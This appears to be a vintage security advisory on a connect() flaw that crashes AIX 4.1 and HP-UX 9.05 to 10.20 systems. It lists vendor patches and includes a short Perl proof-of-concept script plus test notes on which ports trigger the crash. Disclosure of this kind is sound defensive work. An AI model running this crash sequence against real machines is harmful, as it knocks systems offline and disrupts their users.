COMMAND

    connect()

SYSTEMS AFFECTED

    AIX 4.1.4, 4.1.5
    HP-UX 9.05, 10.01, 10.20

PROBLEM

    Steve Campbell wrote a Perl script for the AIX connect()
    vulnerability, and the same script crashes HP-UX as well. All you
    have to do is run this simple Perl program (or see #1 for a C
    program).

        #!/usr/local/bin/perl5
        use Socket;
        socket (SOCK,AF_INET,SOCK_STREAM,0);
        $iaddr = inet_aton('localhost');
        $paddr = sockaddr_in('23',$iaddr);
        connect SOCK,$paddr;
        shutdown SOCK,2;
        $paddr = sockaddr_in('24',$iaddr);
        connect SOCK,$paddr;

    Frank Hofmann has done some tests with the connect example on
    HP-UX 10.01. The original first connected to port 23, shut it
    down and then connected to port 24. He found that only the port
    number of the first connect decides whether the system crashes;
    the second connect is required to trigger the crash, but the port
    it connects to is unimportant. So the sequence

            connect XX -> shutdown XX,2 -> connect ??

    crashes his HP-UX 10.01 box for XX in { 21, 23, 79, 111, 113,
    513, 514, 6000 }, but not for the other values of XX he has tried
    (anything from 1-120, 500-530 and some arbitrary other values).
    He does not have services running on every port he tested, and
    cannot say at the moment whether that is important.

SOLUTION

    For the HP-UX 10.01 box, PHNE_9102 (ARPA transport cumulative
    patch) fixes the crash.

    APAR IX66819 will fix AIX and will be available in a couple of
    months. An "emergency patch" is available from IBM. Anon FTP to

        testcase.boulder.ibm.com/aix/fromibm

    and get the file reconn.41 (for AIX 4.1) or reconn.42 (for AIX
    4.2). There's a new /usr/lib/methods/netinet and a README.